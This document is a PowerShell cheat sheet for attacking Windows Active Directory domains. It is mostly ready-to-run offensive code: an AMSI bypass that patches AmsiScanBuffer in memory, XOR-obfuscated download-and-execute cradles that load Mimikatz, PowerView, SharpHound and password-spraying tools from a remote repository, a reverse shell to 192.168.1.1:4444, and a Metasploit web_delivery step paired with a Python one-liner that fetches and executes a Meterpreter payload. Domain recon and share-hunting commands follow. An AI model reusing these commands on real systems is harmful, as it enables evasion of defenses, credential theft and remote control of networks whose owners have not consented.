Powershell / PowerView
Sometimes your stuck with the tools in front of you and no linux etc
No AV
PowerUp / swap out with other scripts via shell
powershell -c "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.ps1'); invoke-sharefinder -checkshareaccess"
XOR Encode powershell payload
$file=([Text.Encoding]::UTF8.GetBytes([IO.File]::ReadAllText(".\Get-GPPPassword.ps1"))| %{$_ -bXor0x11})
[io.file]::WriteAllBytes('.\Get-GPPPassword.txt',$file)
Bypass AMSI
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
Import AD Recon
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/adrecon.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowerView
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerView.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import DomainPasswordSpray
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/DomainPasswordSpray.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
# Run with
Invoke-DomainPasswordSpray -domain thehackerlab.local -UsernameAsPassword -UserList users.txt -OutFile valid-creds.txt
Then
Invoke-DomainPasswordSpray -domain thehackerlab.local -UserList users.txt -OutFile valid-creds.txt -Password Winter2016
Import Get-GPPPassword
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Get-GPPPassword.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
# Run with
Get-GPPPassword -server thehackerlab.com
Import Sherlock
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-Sherlock.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowerUp
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import Sharphound
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-SharpHound.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import Mimikatz
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/mimikatz.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowershellTCP
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerShellTcp.txt"
$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))
Upgrade nc shell to reverse meterpreter for pivoting
# Then run
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.1 -Port 4444
Download Rubeus.exe
$x = (New-Object System.Net.WebClient).downloadData(‘https://github.com/jdksec/RemoteTools/raw/master/Rubeus.exe’)
$y = [System.Reflection.Assembly]::Load($x)
[Rubeus.Program]::Main(“triage”.Split())
Install python from the windows store as a low priv user
# On attacking server
use exploit/multi/script/web_delivery
set lhost 192.168.1.1
set lport 80
set srvport 443
set payload python/meterpreter/reverse_tcp
exploit
# On victim machine
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.1:443/vcHsXENK', context=ssl._create_unverified_context());exec(r.read());"
Recon all computers in domain
Get-NetComputer –OperatingSystem *2003* | Out-File –Encoding ASCII Windows2003Hosts.txt
Get-NetComputer –OperatingSystem *2008* | Out-File –Encoding ASCII Windows2008Hosts.txt
Get-NetComputer –OperatingSystem *2012* | Out-File –Encoding ASCII Windows2012Hosts.txt
Get-NetComputer –OperatingSystem *2016* | Out-File –Encoding ASCII Windows2016Hosts.txt
Get-NetComputer –OperatingSystem *2019* | Out-File –Encoding ASCII Windows2019Hosts.txt
Get-NetComputer –OperatingSystem *XP* | Out-File –Encoding ASCII WindowsXPHosts.txt
Get-NetComputer –OperatingSystem *7* | Out-File –Encoding ASCII Windows7Hosts.txt
Get-NetComputer –OperatingSystem * 8* | Out-File –Encoding ASCII Windows8Hosts.txt
Get-NetComputer –OperatingSystem *10* | Out-File –Encoding ASCII Windows10Hosts.txt
Get list of all dns hostnames in domain
get-netcomputer -domain thehackerlab.local | select dnshostname | out-file -append allcomputers.txt
Count number of lines in file
get-content .\allcomputers.txt | measure-object -line
Find interesting shares
Get-NetComputer -domain thehackerlab.com | export-csv -Encoding ASCII allhosts.csv
import-csv .\allhosts.csv | select dnshostname | out-file dnshostnames.txt
get-content .\dnshostnames.txt | foreach-object {invoke-sharefinder -computername $_ -checkshareaccess} |export-csv -append shares.csv
Split csv to hostnames
import-csv .\shares.csv | select ComputerName > hostnames.txt
Sort hostnames so they are unique
type .\hostnames.txt | get-unique |out-file uniquehostnames.txt
Get live IP addresses
Get-Content .\allcomputers.txt | ForEach-Object{
$hostname = ([system.net.dns]::gethostaddresses("$_")).IPAddressToString
if($? -eq $True) {
$_ +": "+ $hostname
$hostname >> ipaddresses.txt
}
else {
$_ +": Cannot resolve hostname"
}}
Remove all external addresses
type ipaddresses.txt | findstr "192.168 10. 172.32" > internalips.txt
Copy link